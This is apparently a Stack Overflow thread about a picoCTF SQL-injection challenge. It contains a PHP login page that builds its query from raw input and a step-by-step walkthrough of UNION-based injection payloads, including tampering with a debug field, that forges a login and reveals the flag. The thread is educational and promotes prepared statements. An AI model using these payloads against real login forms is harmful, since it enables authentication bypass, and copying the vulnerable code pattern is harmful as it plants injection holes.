# mysql injection to get one row

Tags: php, mysql, sql-injection

I am new to SQL injections and trying to learn how to write a query in to the input box that will **return a row**. Following website has the input filed `Username:` and `Password:` This website has the following PHP code:

```
<?php
include "config.php";
$con = mysqli_connect("localhost", "sql2", "sql2", "sql2");
$username = $_POST["username"];
$password = $_POST["password"];
$debug = $_POST["debug"];
$query = "SELECT * FROM users WHERE username='$username'";
$result = mysqli_query($con, $query);
echo "MYSQL Injection Tutorial:<br><br>";

if (intval($debug)) {
  echo "<pre>";
  echo "username: ", htmlspecialchars($username), "\n";
  echo "password: ", htmlspecialchars($password), "\n";
  echo "SQL query: ", htmlspecialchars($query), "\n";
  if (mysqli_errno($con) !== 0) {
    echo "SQL error: ", htmlspecialchars(mysqli_error($con)), "\n";
  }
  echo "</pre>";
}

$logged_in = false;
if (mysqli_num_rows($result) === 1) {
  $row = mysqli_fetch_array($result);
  if ($row["password"] === $password) {
    $logged_in = true;
    echo "<h1>Logged in!</h1>";
    echo "<pre>User level: ", $row["user_level"],  "</pre>";
    if ($row["user_level"] >= 50) {
      echo "<p>you have found a high level user</p>";
    } else {
      echo "<p>you didn't find a user that has a high level.</p>";
    }
  }
}

if (!$logged_in) {
  echo "<h1>Login failed. Try Again</h1>";
}
?>
```

If you have any ideas, please show me with an example

Comment: Try use bind-param: http://php.net/manual/en/mysqli-stmt.bind-param.php (This helps against injections because the process occurs in mysql server and not the client (php)) > Note: You question sounds like off-topic.

Comment: You're only "new to [SQL injections](http://bobby-tables.com/)" because you haven't been using the correct facilities for avoiding them. A modern [development framework](http://codegeekz.com/best-php-frameworks-for-developers/) like [Laravel](http://laravel.com/) has ways of interacting with the database that largely avoid this sort of problem if you follow the proper procedures. What you've got here is a train-wreck of code, HTML, SQL and PHP all smashed together.

Comment: This question appears to be off-topic because it is about software security. You may be able to get help on [Security.SE](http://security.stackexchange.com).

Comment: Thank you for all of your comments and answers. they were all helpful

Answer (score 4, accepted):

Given the SQL construct used in the code, i.e:

```
SELECT * FROM users WHERE username='$username'
```

That does appear to have SQL Injection vulnerability. To successfully exploit this, we'd likely need to hammer several attempts at the page.

Since we can't modify the constant part of that string, we'd aiming at getting the SQL text to be something like this:

```
SELECT * 
  FROM users
 WHERE username = '' AND 1=0
UNION ALL
SELECT '','','','secret' AS password, '51' AS user_level, ''
```

Obviously, we'd have to successfully guess the number of columns in users, and guess the positions of the "`password`" and "`user_level`" columns.  We could try putting the password and in at several points...

On the text entry form, for username, we'd enter something like:

```
' AND 1=0 UNION ALL SELECT 'secret','secret','secret','secret','51','51','51',51
```

For password, we'd enter: `secret`

We could hammer on it with different number of columns and different positions for password and user_level.

With enough attempts, we could get a row returned by the query. If we had knowledge of the number of columns and the position of the password and user_level columns, we'd be way ahead of the game.

If we can enable that debug, and get the website to display the SQL error, that will also make it easier for us. Once we hit a form that doesn't return a SQL error, we know we've got the number of columns guessed right. We don't have to guess the column names correctly, since a UNION/UNION ALL query gets the column names from the first query.

---

Note that our attempts would be entirely thwarted if the app was using a prepared statement with a bind variable. (We'd need to exploit a vulnerability in the prepared statement/bind placeholder in order to get our data injected into the SQL text.)

---

**Followup**

If we fiddle with the post values before they are sent, we can set that "hidden" debug value to 1.

We're going to start with a guess that the table `users` has at least three columns.

attempt **1** (try three columns):

```
username: ' OR 1=0 UNION ALL SELECT 'a','a','a
password: a
SQL query: SELECT * FROM users WHERE username='' OR 1=0 UNION ALL SELECT 'a','a','a'
SQL error: The used SELECT statements have a different number of columns
Login failed.
```

The login page is leaking information. We now know the query that the page is running, and we know that the users table does not have three columns.

attempt **2**, (try four columns):

```
username: ' OR 1=0 UNION ALL SELECT 'b','b','b','b
password: b
SQL query: SELECT * FROM users WHERE username='' OR 1=0 UNION ALL SELECT 'b','b','b','b'
SQL error: The used SELECT statements have a different number of columns
```

So, it's not four columns either. Let's try five columns.

attempt **3**, (try five columns):

```
username: ' OR 1=0 UNION ALL SELECT 'c','c','c','c','c
password: cb
SQL query: SELECT * FROM users WHERE username='' OR 1=0 UNION ALL SELECT 'c','c','c','c','c'
Logged in!
User level: c
Only user levels 1337 or above can see the flag.
```

So, we know know that the users table has five columns. Now we just need to figure out which of those columns is the password column.

attempt **4** (password as fifth column):

```
username: ' OR 1=0 UNION ALL SELECT 'a','b','c','d','e
password: e
SQL query: SELECT * FROM users WHERE username='' OR 1=0 UNION ALL SELECT 'a','b','c','d','e'
Login failed.
```

So, password is not the fifth column. Let's try the fourth column:

attempt **5** (password as fourth column):

```
username: ' OR 1=0 UNION ALL SELECT 'a','b','c','d','e
password: d
SQL query: SELECT * FROM users WHERE username='' OR 1=0 UNION ALL SELECT 'a','b','c','d','e'
Login failed.
```

So, we know password is not the fourth column. Let's try the third column.

attempt **6** (password as the third column):

```
username: ' OR 1=0 UNION ALL SELECT 'a','b','c','d','e
password: c
SQL query: SELECT * FROM users WHERE username='' OR 1=0 UNION ALL SELECT 'a','b','c','d','e'
Logged in!
User level: e
Only user levels 1337 or above can see the flag.
```

So now we've determined that the password is the third column in the users table. The page is leaking more information to us. It looks like the fifth column is the user level (the output we got back tells us the user level is the value we supplied for the fifth column.  So let's try specifying 1337 as the value of the fifth column.

attempt **7** (password as third column, fifth column as user level = 1337):

```
username: ' OR 1=0 UNION ALL SELECT 'a','b','c','d','1337
password: c
SQL query: SELECT * FROM users WHERE username='' OR 1=0 UNION ALL SELECT 'a','b','c','d','1337'
Logged in!
User level: 1337
Your flag is: flag_nJZAKGWYt7YfzmTsCV
```

So, we've demonstrated exploit of SQL Injection vulnerability, in just seven tries.

Comment: I was working on this same problem few days ago. The question ask to log in to this website: http://web2014.picoctf.com/injection2/ However, with the quarry you have provided, I couldn't log in to the site. Note: bottom of this page, it gives the actual php code used: `login.php source code`

Comment: @Justink: I've edited the question to include a demonstration of exploiting the SQL Injection vulnerability. I was able to get "**Logged in!** and "**Your flag is:**" returned in 7 tries.  (I just noticed I used `OR 1=0` in my attempts, I should have followed the pattern in my original answer, `AND 1=0` to guarantee I wouldn't return a row from users. It happened that there is no row in users with a `username = ''`, so it didn't matter.

Comment: @spencer7593 Thank you for showing me with such amount of details and explain to me everything. Now I understand it and every thing is clear. Thanks a lot.

Comment: @DP: And this demonstrates why (for the love of all that is good and beautiful in this world) we continually recommend developers use **prepared statements** with **bind placeholders**, or barring that, at a minimum, using the MySQL **real_escape_string** function on "unsafe" values that are included in SQL text. SQL Injection vulnerabilities open a whole world of nefariousness ala **Little Bobby Tables** [http://xkcd.com/327/](http://xkcd.com/327/)

Comment: @spencer7593 That's a very nice answer. Thank you for taking your time and helping every one. Can you please tell us how you got the SQL errors to show on your browser. I tried all your examples with `Google chrome` and `Internet Explore`, but it didn't show any leaking information.

Comment: @Justink: one of the parameters in the POST is named "debug". You can see it in the code, and you can see it in the web page if you do a "view source". If you change that hidden value on the POST request, you can get the output like I showed. For Chrome, you can use a http proxy to intercept the request from the browser, and then make changes to the POST, and then send the modified POST request. You can do the same thing with IE and Firefox, but there are also addons available for Firefox, such as TamperData.

Answer (score 1):

There are some issues to overcome here. First, `mysqli_query` will not let you execute more than one statement at a time, so you're limited to what you can do with the original query. Secondly, the code manually checks the entered password against the row that MySQL returns, so you are going to need to insert fake data into the returned result.

The following will work, but **it will require knowledge of the table structure**.

I will assume the table only has three columns, and they are defined in this order: `username`, `password`, `user_level`

Use this as your username:

`' AND 1 = 2 UNION SELECT username, 'password' AS password, user_level FROM users WHERE user_level > '50`

And "password" as the password.

What this does is make the original SELECT search for something it will never find (`AND 1 = 2`). We could just leave this part out, but there might be a user with a blank username, which would mess things up.

Next, we create our own query, injecting a hard-coded password into the row, and finding a user with the desired level. Then we union this to the (currently empty) resultset. This is where knowledge of the database structure is required, because `UNION`s need the same number of columns for each `SELECT` (even if the first one is empty). There may be a better way around this, but I'm not a 1337 h4x0r so I don't know!

Comment: +1. Nice. We don't necessarily need to know the name or structure of the table, We only need to successfully guess the number of columns returned by the query, and the position of password and user_level columns. (We can do a `UNION ALL SELECT` with a set of literals. With MySQL, we don't need a FROM clause, and we don't need to know the names of any columns.)

Comment: Yep. The idea behind the `FROM` is so that a real user is returned (minus the injected password). Further down his code you can see he outputs the user_level, so I'd assumed this was what he wanted. I can see how that might not necessarily be the case as long as he can log in.